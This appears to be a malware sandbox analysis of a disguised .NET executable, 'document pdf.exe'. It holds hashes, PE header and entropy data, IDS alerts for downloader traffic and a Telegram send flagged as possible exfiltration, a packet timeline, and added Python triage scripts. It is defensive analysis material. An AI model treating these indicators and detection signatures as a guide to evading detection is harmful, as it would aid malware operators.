SHA-256: 61236876295607A3384F24E00A09AB236B720E5235743C8D7C8675497DCDDDAA
SHA-512: BEB768F81C2217F3E7A0F390BC0EC156324C96C0C06C8BDA8AD3D91A856C06F188D456928FD31F1D270745DCAFCC444782CFD14B86502EDD7ACBDC3E402BCE0B
Malicious: false
Reputation: low
Preview:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
 <tlm>
 <src>
 <desc>
 <mach>
 <os>
 <arg nm="vermaj" val="10" />
 <arg nm="vermin" val="0" />
 <arg nm="verbld" val="19045" />
 <arg nm="vercsdbld" val="2006" />
 <arg nm="verqfe" val="2006" />
 <arg nm="csdbld" val="2006" />
 <arg nm="versp" val="0" />
 <arg nm="arch" val="9" />
 <arg nm="lcid" val="2057" />
 <arg nm="geoid" val="223" />
 <arg nm="sku" val="48" />
 <arg nm="domain" val="0" />
 <arg nm="prodsuite" val="256" />
 <arg nm="ntprodtype" val="1" />
 <arg nm="platid" val="2" />
 <arg nm="tmsi" val="664203" />
 <arg nm="osinsty" val="1" />
 <arg nm="iever" val="11.789.19041.0-11.0.1000" />
 <arg nm="portos" val="0" />
 <arg nm="ram" val="409
                                                                                                                      Process:C:\Users\user\Desktop\document pdf.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):1216
                                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                      Malicious:true
                                                                                                                      Reputation:high, very likely benign file
Preview:
1,"fusion","GAC",0
1,"WinRT","NotApp",1
2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0
2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0
3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0
3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1835008
                                                                                                                      Entropy (8bit):4.468755808571753
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:vzZfpi6ceLPx9skLmb0fzZWSP3aJG8nAgeiJRMMhA2zX4WABluuNKjDH5S:7ZHtzZWOKnMM6bFpwj4
                                                                                                                      MD5:DDD2BE517BADB51059B007FC390F2B4F
                                                                                                                      SHA1:13F406617898A25A195095C2B2641AC9FB137797
                                                                                                                      SHA-256:432E37A067DC4BBAF1ED027DD555DEEA134773B3DF569776E84EE7F8AD03D9AB
                                                                                                                      SHA-512:B31D7E478DC338B5B8A70CB02A2F873CD8942775F7BC1747025443418C56F05FC2214166EB6E866799563E90E89E0E85180445F456102F747A5F0CB117A6C35E
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm*mA.K`...............................................................................................................................................................................................................................................................................................................................................gW.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Entropy (8bit):7.853019642802023
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                      File name:document pdf.exe
                                                                                                                      File size:759'808 bytes
                                                                                                                      MD5:c67b6ff2d472bf82dc4da545dbc37a43
                                                                                                                      SHA1:c5e677e5e48d5ca965b6e2d3f0c8b56fb80e7be5
                                                                                                                      SHA256:df3c8cc4eaf6b0a8a6a0254c54160486df1b38f8a6591a60dbc520f38389c400
                                                                                                                      SHA512:69ba6f8e9e99f09a669ae875412af6bcb87dd649161e8e725be05c9db2ce8fe20da88de509cd9208a427b93172caeb94ed588efa5697eb0ebf5fe262d8943e11
                                                                                                                      SSDEEP:12288:74doaeS+/ZgdvAC+O8DzxPzNjZGtypP2q2PEexgQNqaCBCrRKNr6sj9Gn:EdFeSTdv+O8vxPzNjUtE7280RNqaLrMc
                                                                                                                      TLSH:C4F412E8AE15CC86D8C607B50A32F33B66784E9ED923C253CBDCFDF7751166964182A0
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W.sg..............0..r...$......B.... ........@.. ....................................@................................
                                                                                                                      Icon Hash:53952576d1abd26e
                                                                                                                      Entrypoint:0x4b9142
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x67738157 [Tue Dec 31 05:29:59 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                      Instruction
                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add al, byte ptr [eax]
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb90f0 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xba000 | 0x21a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb7168 | 0xb7200 | 8cd28819f66881db546fcdecf83efc16 | False | 0.9313246587030717 | data | 7.85898553696103 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xba000 | 0x21a0 | 0x2200 | a31bd1c02d4d4cbb683678a915ffa8d7 | False | 0.8984375 | data | 7.474587072139768 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xbe000 | 0xc | 0x200 | 69949a08773b28bfcd5c98e6312f10fb | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xba0c8 | 0x1d72 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9698859113823295
RT_GROUP_ICON | 0xbbe4c | 0x14 | data | | | 1.05
RT_VERSION | 0xbbe70 | 0x32c | data | | | 0.4618226600985222
DLL | Import
mscoree.dll | _CorExeMain
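The static header data above supports two checks a triager makes before opening the sample in a decompiler: the COM descriptor data directory is populated (0x2008, size 0x48), which is what makes this a managed .NET image regardless of the single mscoree.dll!_CorExeMain import, and the executable .text section sits at entropy 7.86 against a ceiling of 8.0, which in a .NET assembly points to an encrypted or compressed payload that is unpacked at run time. The script below is an added example, not code from the report or the sample: it parses a PE32 header, tests the COM descriptor slot, and applies an entropy rule to the section table. The header bytes are constructed from the values printed above (they are not the real file), and the 7.2 entropy cut-off is a rule of thumb, not a figure from the report.

```python
import math
import struct

# Added example (not from the Joe Sandbox report or the sample). All bytes below are
# constructed from the report's printed header values; they are not the real file.

IMAGE_SCN_MEM_EXECUTE = 0x20000000          # section characteristic bit (PE/COFF spec)
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # data directory slot holding the CLI header


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy: 0.0 for a constant byte stream, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe32_header(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> PE32 optional header -> data directories."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, _opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not PE32 (PE32+ lays the optional header out differently)")
    entry = struct.unpack_from("<I", data, opt + 16)[0]        # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", data, opt + 28)[0]   # ImageBase (PE32 offset)
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]        # NumberOfRvaAndSizes
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(min(ndirs, 16))]
    return {"machine": machine, "sections": nsections, "characteristics": chars,
            "entry": entry, "image_base": image_base, "directories": dirs}


def is_dotnet(info: dict) -> bool:
    """A managed image carries a non-empty COM descriptor directory (the CLI header).
    That slot, not the mscoree import, is the reliable .NET indicator."""
    dirs = info["directories"]
    return (len(dirs) > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            and dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] != (0, 0))


def build_sample_header() -> bytes:
    """Constructed PE32 header using the directory RVAs/sizes, entry point and image base
    printed in the report. Hypothetical bytes for the parser above, not the sample's."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 3, 0x67738157, 0, 0, 224, 0x0102)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, 0xB9142)     # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)    # ImageBase
    struct.pack_into("<I", opt, 92, 16)          # NumberOfRvaAndSizes
    dirs = [(0, 0)] * 16
    dirs[1] = (0xB90F0, 0x4F)      # IMPORT
    dirs[2] = (0xBA000, 0x21A0)    # RESOURCE
    dirs[5] = (0xBE000, 0xC)       # BASERELOC
    dirs[12] = (0x2000, 0x8)       # IAT (target of the entry stub's jmp)
    dirs[14] = (0x2008, 0x48)      # COM_DESCRIPTOR
    return dos + coff + bytes(opt) + b"".join(struct.pack("<II", r, s) for r, s in dirs)


# Section table as printed in the report (entropy column copied from it).
REPORT_SECTIONS = [
    {"name": ".text",  "entropy": 7.859, "characteristics": 0x60000020},
    {"name": ".rsrc",  "entropy": 7.475, "characteristics": 0x40000040},
    {"name": ".reloc", "entropy": 0.102, "characteristics": 0x42000040},
]


def triage_sections(sections, threshold: float = 7.2):
    """Flag executable sections whose entropy is near the 8.0 ceiling: in a .NET image
    that is the signature of an encrypted/compressed payload unpacked at run time.
    The 7.2 cut-off is a rule of thumb, not a value from the report."""
    return [f"{s['name']}: executable, entropy {s['entropy']:.2f} >= {threshold}"
            for s in sections
            if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["entropy"] >= threshold]


if __name__ == "__main__":
    info = parse_pe32_header(build_sample_header())
    print(f"entry 0x{info['entry']:x}, .NET: {is_dotnet(info)}")
    for line in triage_sections(REPORT_SECTIONS):
        print(line)
```

Run against a real file, `shannon_entropy` would be applied to each section's raw bytes (the report prints the same 8-bit measure), and `parse_pe32_header` would be fed the file's first few hundred bytes; the parser rejects PE32+ on purpose, since the ImageBase and directory offsets differ there.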
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-06T16:01:11.323685+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49731 | 132.226.8.169 | 80 | TCP
2025-01-06T16:01:12.526830+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49731 | 132.226.8.169 | 80 | TCP
2025-01-06T16:01:13.092549+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49750 | 188.114.96.3 | 443 | TCP
2025-01-06T16:01:14.276805+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49756 | 132.226.8.169 | 80 | TCP
2025-01-06T16:01:14.845558+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49769 | 188.114.96.3 | 443 | TCP
2025-01-06T16:01:16.236493+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49778 | 188.114.96.3 | 443 | TCP
2025-01-06T16:01:17.739768+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49790 | 188.114.96.3 | 443 | TCP
2025-01-06T16:01:22.185426+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49825 | 188.114.96.3 | 443 | TCP
2025-01-06T16:01:25.666289+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 49847 | 149.154.167.220 | 443 | TCP
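Read as a whole, the alert table is three remote endpoints: plaintext HTTP to 132.226.8.169:80 (the only traffic whose headers are visible on the wire, which is what the ETPRO downloader-header rules match), TLS to 188.114.96.3:443, and the TLS session to 149.154.167.220:443 that the Joe Security anomaly rule attributes to a Telegram message send. The script below is an added example, not part of the report: it parses the alert rows and a handful of the packet-timeline rows, groups alerts per destination, lists the remote endpoints as blockable IOCs, and ties each alert back to the client flow that produced it via the ephemeral source port. The sample rows are re-typed from the report's tables as tab-separated text (constructed input, not an eve.json or pcap export); SANDBOX_CLIENT is the analysis VM address the report shows, and the "priority 1 is most severe" ordering is Suricata's convention.

```python
import re
from datetime import datetime

# Added example (not from the Joe Sandbox report). Rows below are re-typed from the
# report's alert and packet tables as tab-separated text: constructed input, not a capture.
ALERTS = """\
2025-01-06T16:01:11.323685+0100\t2803274\tETPRO MALWARE Common Downloader Header Pattern UH\t2\t192.168.2.6\t49731\t132.226.8.169\t80\tTCP
2025-01-06T16:01:12.526830+0100\t2803274\tETPRO MALWARE Common Downloader Header Pattern UH\t2\t192.168.2.6\t49731\t132.226.8.169\t80\tTCP
2025-01-06T16:01:13.092549+0100\t2803305\tETPRO MALWARE Common Downloader Header Pattern H\t3\t192.168.2.6\t49750\t188.114.96.3\t443\tTCP
2025-01-06T16:01:14.276805+0100\t2803274\tETPRO MALWARE Common Downloader Header Pattern UH\t2\t192.168.2.6\t49756\t132.226.8.169\t80\tTCP
2025-01-06T16:01:25.666289+0100\t1810007\tJoe Security ANOMALY Telegram Send Message\t1\t192.168.2.6\t49847\t149.154.167.220\t443\tTCP
"""

PACKETS = """\
Jan 6, 2025 16:01:09.443880081 CET\t49731\t80\t192.168.2.6\t132.226.8.169
Jan 6, 2025 16:01:09.448697090 CET\t80\t49731\t132.226.8.169\t192.168.2.6
Jan 6, 2025 16:01:11.323684931 CET\t49731\t80\t192.168.2.6\t132.226.8.169
Jan 6, 2025 16:01:12.480148077 CET\t49750\t443\t192.168.2.6\t188.114.96.3
Jan 6, 2025 16:01:12.480175018 CET\t443\t49750\t188.114.96.3\t192.168.2.6
Jan 6, 2025 16:01:13.098479033 CET\t49756\t80\t192.168.2.6\t132.226.8.169
"""

SANDBOX_CLIENT = "192.168.2.6"   # the analysis VM's address as shown in the report


def parse_alerts(text):
    """Parse tab-separated alert rows into dicts; timestamps become aware datetimes."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, prio, sip, sport, dip, dport, proto = line.split("\t")
        rows.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "signature": sig, "priority": int(prio),
            "src": (sip, int(sport)), "dst": (dip, int(dport)), "proto": proto,
        })
    return rows


def summarize_by_destination(alerts):
    """Group alerts per (dst_ip, dst_port): count, distinct SIDs, best priority, time span."""
    out = {}
    for a in alerts:
        s = out.setdefault(a["dst"], {"count": 0, "sids": set(), "top_priority": 99,
                                      "first": a["ts"], "last": a["ts"]})
        s["count"] += 1
        s["sids"].add(a["sid"])
        s["top_priority"] = min(s["top_priority"], a["priority"])  # Suricata: 1 is most severe
        s["first"], s["last"] = min(s["first"], a["ts"]), max(s["last"], a["ts"])
    return out


def network_iocs(alerts):
    """Remote endpoints to block or hunt for: every alert destination other than the client."""
    return sorted({f"{ip}:{port}" for ip, port in (a["dst"] for a in alerts)
                   if ip != SANDBOX_CLIENT})


def cleartext_alerts(alerts):
    """Alerts on plaintext HTTP (port 80): the only flows whose request headers are inspectable."""
    return [a for a in alerts if a["dst"][1] == 80]


# The report prints nanosecond timestamps; strptime's %f takes at most six digits.
_TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d{6})\d*\s+CET$")


def flows_from_packets(text):
    """Group packet rows into client flows keyed by the sandbox client's ephemeral port."""
    flows = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, sip, dip = line.split("\t")
        ts = datetime.strptime(_TS_RE.match(ts).group(1), "%b %d, %Y %H:%M:%S.%f")
        if sip == SANDBOX_CLIENT:
            key, remote = int(sport), (dip, int(dport))
        else:
            key, remote = int(dport), (sip, int(sport))
        f = flows.setdefault(key, {"remote": remote, "packets": 0, "first": ts, "last": ts})
        f["packets"] += 1
        f["first"], f["last"] = min(f["first"], ts), max(f["last"], ts)
    return flows


def correlate(alerts, flows):
    """(sid, client port, packets seen in that flow) for each alert; 0 if the flow is not in the sample."""
    return [(a["sid"], a["src"][1], flows.get(a["src"][1], {}).get("packets", 0)) for a in alerts]


if __name__ == "__main__":
    alerts = parse_alerts(ALERTS)
    for dst, s in summarize_by_destination(alerts).items():
        print(dst, s["count"], sorted(s["sids"]), "priority", s["top_priority"])
    print("IOCs:", network_iocs(alerts))
    print(correlate(alerts, flows_from_packets(PACKETS)))
```

The per-port flow key works because every row in the report's timeline has the sandbox client on one side; on a real network the same grouping needs the full 5-tuple. The Telegram alert correlates to zero packets here only because the constructed PACKETS sample stops before 16:01:25.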
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 6, 2025 16:01:09.443880081 CET | 49731 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:09.448697090 CET | 80 | 49731 | 132.226.8.169 | 192.168.2.6
Jan 6, 2025 16:01:09.451230049 CET | 49731 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:09.454629898 CET | 49731 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:09.459398985 CET | 80 | 49731 | 132.226.8.169 | 192.168.2.6
Jan 6, 2025 16:01:11.017657042 CET | 80 | 49731 | 132.226.8.169 | 192.168.2.6
Jan 6, 2025 16:01:11.027211905 CET | 49731 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:11.031995058 CET | 80 | 49731 | 132.226.8.169 | 192.168.2.6
Jan 6, 2025 16:01:11.280863047 CET | 80 | 49731 | 132.226.8.169 | 192.168.2.6
Jan 6, 2025 16:01:11.323684931 CET | 49731 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:11.355398893 CET | 49744 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:11.355431080 CET | 443 | 49744 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:11.355518103 CET | 49744 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:11.415021896 CET | 49744 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:11.415035963 CET | 443 | 49744 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:11.897778034 CET | 443 | 49744 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:11.897888899 CET | 49744 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:11.908380032 CET | 49744 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:11.908396959 CET | 443 | 49744 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:11.908735991 CET | 443 | 49744 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:11.950437069 CET | 49744 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:12.053241014 CET | 49744 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:12.099339962 CET | 443 | 49744 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:12.170140982 CET | 443 | 49744 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:12.170202017 CET | 443 | 49744 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:12.170300007 CET | 49744 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:12.204561949 CET | 49744 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:12.210125923 CET | 49731 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:12.214957952 CET | 80 | 49731 | 132.226.8.169 | 192.168.2.6
Jan 6, 2025 16:01:12.477199078 CET | 80 | 49731 | 132.226.8.169 | 192.168.2.6
Jan 6, 2025 16:01:12.480148077 CET | 49750 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:12.480175018 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:12.480236053 CET | 49750 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:12.480727911 CET | 49750 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:12.480740070 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:12.526829958 CET | 49731 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:12.956809998 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:12.963751078 CET | 49750 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:12.963763952 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:13.092585087 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:13.092645884 CET | 443 | 49750 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:13.092699051 CET | 49750 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:13.093344927 CET | 49750 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:13.097086906 CET | 49731 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:13.098479033 CET | 49756 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:13.103308916 CET | 80 | 49756 | 132.226.8.169 | 192.168.2.6
Jan 6, 2025 16:01:13.103389978 CET | 49756 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:13.103512049 CET | 49756 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:13.104187012 CET | 80 | 49731 | 132.226.8.169 | 192.168.2.6
Jan 6, 2025 16:01:13.104269981 CET | 49731 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:13.108227968 CET | 80 | 49756 | 132.226.8.169 | 192.168.2.6
Jan 6, 2025 16:01:14.221856117 CET | 80 | 49756 | 132.226.8.169 | 192.168.2.6
Jan 6, 2025 16:01:14.231432915 CET | 49769 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:14.231482029 CET | 443 | 49769 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:14.231548071 CET | 49769 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:14.231995106 CET | 49769 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:14.232011080 CET | 443 | 49769 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:14.276804924 CET | 49756 | 80 | 192.168.2.6 | 132.226.8.169
Jan 6, 2025 16:01:14.700351000 CET | 443 | 49769 | 188.114.96.3 | 192.168.2.6
Jan 6, 2025 16:01:14.702382088 CET | 49769 | 443 | 192.168.2.6 | 188.114.96.3
Jan 6, 2025 16:01:14.702408075 CET | 443 | 49769 | 188.114.96.3 | 192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.845314026 CET44349769188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.845372915 CET44349769188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.845520020 CET49769443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:14.846013069 CET49769443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:14.852261066 CET4977280192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:14.857026100 CET8049772132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.857084990 CET4977280192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:14.857208014 CET4977280192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:14.862010002 CET8049772132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:15.638887882 CET8049772132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:15.640721083 CET49778443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:15.640765905 CET44349778188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:15.640834093 CET49778443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:15.641274929 CET49778443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:15.641294003 CET44349778188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:15.683053017 CET4977280192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:16.099010944 CET44349778188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:16.101175070 CET49778443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:16.101197004 CET44349778188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:16.236545086 CET44349778188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:16.236607075 CET44349778188.114.96.3192.168.2.6
